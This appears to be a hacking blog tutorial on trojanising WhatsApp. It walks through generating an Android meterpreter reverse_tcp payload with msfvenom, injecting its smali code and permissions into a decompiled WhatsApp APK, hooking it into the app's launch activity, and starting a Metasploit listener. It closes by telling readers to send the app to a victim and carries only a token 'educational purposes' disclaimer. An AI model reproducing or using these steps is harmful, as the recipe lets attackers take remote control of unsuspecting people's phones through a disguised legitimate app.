Now we are going to learn about Binding viruses with Applications.
So let's get started...
- Now we are going to create a payload using Metasploit and bind it with the Whatsapp application.
- For that, we just need to decompile WhatsApp first, for the decompilation of Whatsapp you need the tool named "apkeasytool".
- You can easily find that tool on google. We are going to install this tool on windows. To use this tool you need to install more components, we'll see them one by one.
Installation of "apkeasytool" Tool
Follow the below steps to install "apkeasytool" and run it perfectly :
- Go to this link -
- Download it.
- Then we need to download Java, Go to and download Java.
- If you do not install java on your system, so in the future it gives you an error. So must download it.
- And the last thing we need to download is APKTOOL Download it using the
- Link -
- just click on the current version displayed on the menu it starts downloading automatically.
- After downloading all of this install them properly.
- Open the folder of apkeasytool Tool.
- Then simply click on the apkeasytool.exe file go to the options tab select the apktool version and set it new version you installed by following the steps.
- To replace it you can simply copy or cut the apktool you just downloaded.
- Go inside the folder of APK easy tool inside that folder.
- You will find another folder named Apktool in that folder you will get the older version of apk. Just delete and Paste or Replace the newly downloaded version.
Now you have done the setup of apktool and java, but if it is showing you decompile error check that you correctly set the apktool.
Now you have done the setup of apktool and java, but if it is showing you decompile error check that you correctly set the apktool.
And the other reason for not decompiling is due to Space in the name do not give any spaces in the name that was a common silly mistake some peoples do.
Now you can successfully install and set the apkeasytool in the system, and now start the real Payload.
Binding virus in Whatsapp
For that follow the steps:
- Download the original Whatsapp APK on your Windows PC
- Decompile the Whatsapp
Now we need a Payload to bind create Payload using the following commands in Linux:
msfvenom -p android/meterpreter/reverse_tcp lhost=(host name) lport=(port name) > Payload.apk
python3 -m http.server 8000
- Open the smali folder then the com folder copy the Metasploit folder
- Now Open the Whatsapp folder then again go to the smali folder the com folder.
- Then paste the Metasploit folder there, and DONE!!!
You completed your first step. we injected the payload source code into our WhatsApp.
After this, you need to give it permission, for that just,
- Go to your Payload folder then open the Manifest.xml file
- Copy all <uses-permission> and <uses-features>
- Paste all of this in the WhatsApp manifest for that go to the Whatsapp folder and open the Manifest.xml file and paste it below all pre permissions
- Then save it.
After that We did our two steps successfully now just we need one thing that our Payload starts automatically when the user starts the app For that follow the steps listed below:
- Open up the apkeasytool Browse WhatsApp and click on the Full APK information button.
- Then search for launchable activity. We need the path of Launchable activity it is given in the name.
- Now go to Whatsapp folder > smali > com > WhatsApp> Search for a folder named Main.smali > Open it > Search for onCreate when you find invoke-super > just Paste the Metasploit code below it. Named as invoke-static > Save it.
Now We are done with everything we need so now just compile the WhatsApp using apkeasytool. After compilation is done then simply sign the apk otherwise It not install in your system. After this, you find it in the Folder named Recompiled APKs.
Start the listener in your Linux terminal by following commands:
Open the console using
After that just type the following commands:
use exploit/multi/handler
set payload android/meterpreterreverse_tcp
set lport = (Set you lport)
Now you are good to go just send it to your victim and when they open the app you can hack their device.
NOTE: We created this post only for educational purposes! or author of post are not responsible for any suspicious activity of audiences. 👀
Hope this post will help you to know more about Hacking using Android!
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